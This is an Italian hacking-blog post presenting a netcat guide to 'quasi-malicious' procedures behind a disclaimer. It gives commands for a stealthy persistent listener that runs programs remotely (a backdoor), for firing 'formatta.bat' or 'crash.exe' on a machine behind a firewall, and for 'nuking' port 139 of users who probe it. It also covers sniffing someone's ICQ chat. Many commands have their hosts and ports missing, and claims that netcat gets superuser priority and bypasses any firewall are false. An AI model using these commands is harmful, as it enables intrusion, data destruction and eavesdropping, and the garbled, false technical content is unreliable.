DISCLAIMER!

Le informazioni (e i download, quindi tutti i file contenuti nel blog) da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio e/o illecito delle tecniche e dei programmi qui descritti e di tutti i danni a cose e persone e/o perdite di guadagni che ne possano derivare. Il blog non vuole istigare nessuno a delinquere o a commettere reati. Le tecniche qui descritte sono da utilizzare a proprio rischio e pericolo.

Traduci Il Blog In




Cerca in Xthreme Hacking!

Guida NetCat


Guida all'uso di NetCat

Procedure quasi-maliziose con netcat.
Ogni procedura puo' essere provata direttamente sul
proprio computer utilizzandolo contemporaneamente come
client e come server.
e' sufficiente aprire due form dos ed eseguire all'interno
le procedure relative.
L'ip a cui collegarsi in modalita' client ovviamente sara'

127.0.0.1 = (localhost)
Se durante l'esecuzione dei comandi il dial-up cerca di
stabilire una connessione : premere annulla nel form
relativo .. se ci si collega al nostro computer siamo
gia' collegati anche senza il dial no!? ;-)


lista delle opzioni di netcat utilizzate

( nc -h per avere l'help)

-d modo stealth, rende TSR e invisibile netcat
-e prog.exe esegue il programma prog.exe
-i secs delay, tempo di ritardo in secondi
-l modo 'in ascolto' esecuzione unica
-L modo 'in ascolto' esecuzione ciclica
-n dichiara che gli IP sono in formato numerico
-o file salva file relativo al traffico su una porta
-p port porta numero
-s addr indirizzo IP a cui collegarsi
-t emula i protocolli di scambio di TELNET
-u abilita il protocollo UPD
-v 'verbose' stampa a schermo tutto quello che fa'
-vv 'very verbose' come sopra ma piu' approfondito
-w secs timeout. Dopo si disabilita e/o esegue
-z modo zero-I/O. Usato nello scanning delle porte.


NETCAT NELLA PRATICA OPERATIVA


NETCAT FUNZIONANTE COME TSR


l'opzione -d (stealth) aggiunta come parametro permette il
funzionamento di netcat in modo invisibile (nessun form del
dos viene aperto)
Questo puo' essere usato sopratutto nella gestione di netcat
sul computer remoto per non dar la possibilita' di vedere
l'esecuzione dei comandi.
Questa opzione non funziona su tutte le macchine, dipende dalle
locazioni chiamate dalle word tsr init DS:WR, DS:ES che variano
a seconda delle versioni di w95 e NT.
Sulle macchine (poche) dove l'opzione crea errore per rendere stealth
netcat bisogna compilare un prog in c o in basic che trovi
l'handler del form dos aperto e lo sposti tramite la API
MoveWindow in una locazione del desktop non visibile.

es:

KEYLOG DEL CLIENT SUL COMPUTER SERVER

(utile per scrivere un file passo passo sul remoto)

SERVER
nc -d -l -p > c:\windows\sorpresa.txt

CLIENT
nc

scrivendo del testo e terminando la digitazione
con CTRL C sul server verra' scritto alla locazione
designata tutto cio' che e' stato digitato con
l'analoga formattazione.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SPEDIZIONE DI UN FILE AD UN COMPUTER REMOTO

COMPUTER CHE RICEVE

nc -l -p -v -t -w 3 > prova.txt

le opzioni -v -t non servono all'atto pratico
sono solo per fare le verifiche.
-L (elle maiuscola) al posto di -l se si vuole che
dopo la ricezione netcat si riesegua automaticamente
con le stesse opzioni. (Esecuzione ciclica)

COMPUTER CHE INVIA

nc < filedainviare.txt


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
CHAT ANONIMA PERSONALE CON UN ALTRO UTENTE

si aprono due form DOS

PERSONA 1:
nc -l -p -v (ascolta e vede sulla porta 1)
nc (manda i caratteri sulla porta 2)

PERSONA 2:
nc -l -p -v (ascolata e vede sulla porta 2)
nc (manda i caratteri sulla porta 1)


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ESECUZIONE DI UN PROGRAMMA SU UN COMPUTER REMOTO

COMPUTER REMOTO:
nc -l -p -e c:\dir1\dir2\..\formatta.bat

-L (elle maiuscola) al posto di -l se si vuole che
dopo la ricezione netcat si riesegua automaticamente
con le stesse opzioni. (Esecuzione ciclica)
(ovviamente il file formatta.bat va fatto e spedito
prima!)

ALTRO COMPUTER:

nc



1. OGNI PROCEDURA PUO' ESSERE ESEGUITA SU PROTOCOLLO UPD
AGGIUNGENDO -u alle opzioni

2. E' possibile (richiamo precedente) usare l'opzione stealth
per rendere invisibile l'attesa di chiamata da parte di netcat
sul computer remoto: le opzioni in questo caso cambiano in

COMPUTER REMOTO

nc -d -L -p -e c:\dir1\dir2\..\programma.exe


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ESECUZIONE DI UNO SCRIPT SU TELNET

ES: SPEDIZIONE DI UNA MAIL SU SMTP

File posta.txt
inizio ---------------------------------------
MAIL FROM : Master
RCPT TO : qualcuno@qualcuno.qu
DATA
Ciao ciao.
ti mando questa mail tramite netcat!
.
fine ---------------------------------------

nc 25 < posta.txt

ES: SPEDIZIONE DI ARTICOLO SU ALT.HACKERS

File articolo.txt
inizio ----------------------------------------
group alt.hackers
listgroup alt.hackers
post
From: Master
Newsgroups: alt.hacker
Subject: Post con netcat
Approved: approvato!
X-Newsreader: NETCAT PROFESSIONAL ;-)

questo articolino viene spedito
tramite netcat.
.
fine ----------------------------------------

nc 119 < articolo.txt

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
VERIFICA DELLE INTROMISSIONI SU UNA PORTA
CON VISIONE DELL'IP DI COLLEGAMENTO E CARATTERI
RICEVUTI


ES: PING DA PARTE DI UTENTI BACKORIFICE!


nc -l -v -u -p 31337

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

CATALOGO DEGLI USER CHE PINGANO SULLA 31337 UPD



nc -l -v -u -p 31337 >> catalogo.txt

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

VERIFICA E SPEDIZIONE DI TESTO IN CASO DI PING (a altro)

nc -l -v -u -p 31337 > trovaip.cmd
nc -n -s -p 139 < nuke.txt

ci vuole un piccolo script in c per passare
l'IP dal file trovaip.cmd a
(usare per danneggiare il sistema caratteri
preceduti dal carattere ^ = CTRL ... ^Z=invio)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

NETCAT >>> E' <<< UGUALE A TELNET

invece di TELENT indirizzo porta

basta dire NC indirizzo porta

con la differenza che mentre telnet usa esclusivamente il
protocollo TCP netcat spedisce e riceve anche su UPD settando
il parametro -u.


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SUPERSNIFFER
-SALVA UN FILE CONTENENTE IL TRAFFICO ASCII PASSANTE PER UNA PORTA


es. collegandosi alla porta chat di uno che conversa in ICQ
si registra tutto quello che invia. ;-)

SUL PROPRIO COMPUTER

nc -l -p -o c:\dir\..\leggotutto.txt

poi per fare la prova ci si puo collegare su un altro
form dos con
nc 127.0.0.1
e provare a digitare qualcosa seguito da CTRL C per
leggere poi il traffico ASCI nel file leggotutto.txt
dovrebbe essere un qualcosa del tipo
file leggotutto.txt ---------------------------------
< 00000000 61 73 64 95 61 73 64 0a # asd.asd.
< 00000008 61 73 64 0a # asd.
< 0000000c 73 73 0a # ss.
< 0000000f 73 0a # s.
< 00000011 73 0a # s.
< 00000013 0a # .
< 00000014 73 0a # s.
< 00000016 73 64 61 61 73 64 0a # sdaasd.
fine -----------------------------------------------

SUL COMPUTER REMOTO


nc -l -p -s -o c:\dir\..\leggo.txt

oppure se si conosce l'ip in forma numerica

nc -l -p -n -s -o c:\dir\..\leggo.txt

si legge il traffico ascii sulla porta del computer
remoto e ovviamente viene registrato il tutto sul proprio
computer nel file leggo.txt

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SNIFFER - SCANNER

TROVARE UNA PORTA APERTA SUL COMPUTER REMOTO


nc - -v

es: nc 123.456.789.012 1000-2000 -v

[ con porta1-porta2 si dichiara un
range di porte da scannerare ]

nc va alla ricerca di una porta rispondente dalla 1000
alla 2000 sul computer remoto. E' MOLTO LENTO!!!
per abbreviare i tempi a scapito della precisone
si puo' usare l'opzione -z

nc 123.456.789.012 1000-2000 -v -z

per fare la prova si apre in un form dos nc con le seguenti opzioni

nc -l -v -p 1234 ( apre la porta 1234 e si mette in ascolto)

in un altro form dos si esegue

nc 127.0.0.1 1230-1240

dopo un po' nc stampera' le informazioni trovate relativamente
alla porta aperta.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

PRIORITA' (questo c'e' anche sulla guida!)

Netcat si assegna di default una priorita' di connessione di livello
admin superuser percui l'esecuzione dei comandi e delle varie opzioni
viene eseguita al di sopra di ogni altro protocollo.


es: eseguendo un comando parallelamente ad una sessione netbios o
anche sotto firewall si oltrepassa la priorita' di queti ultimi
permettendo l'aggiramento di ogni tipo di protezione.

es. netbios

nc -v -l -p 139 -n -s > leggo.txt
legge i dati sulla porta 139 di un macchina in remoto
collegandosi all'IP sorgente.
Se il remoto effettua delle transazioni su quest'ultima
netcat mette il netbios in attesa e finisce prima il proprio
lavoro (spesso macchine NT vanno in crash.)

.. si potra' anche inviare sulla 139 dei dati? mah! ;-)))

es. firewall

di solito i firewall permettono la lettura sulle porte
53 e/o 59 e/o 20 .. questo almeno per l'invio dei dati
relativi alle dichiarazioni di 'avvertimento'.. questo basta!

sulla macchina sotto firewall volendo ad esempio far partire
il programma crash.exe in diverse riprese si installa
netcat nel seguente modo:

nc -d -L -p -e c:\dir\..\crash.exe

sulla propria invece

nc -v -p

(-v e' giusto per vedere che cosa dice!)

Nessun commento:

Posta un commento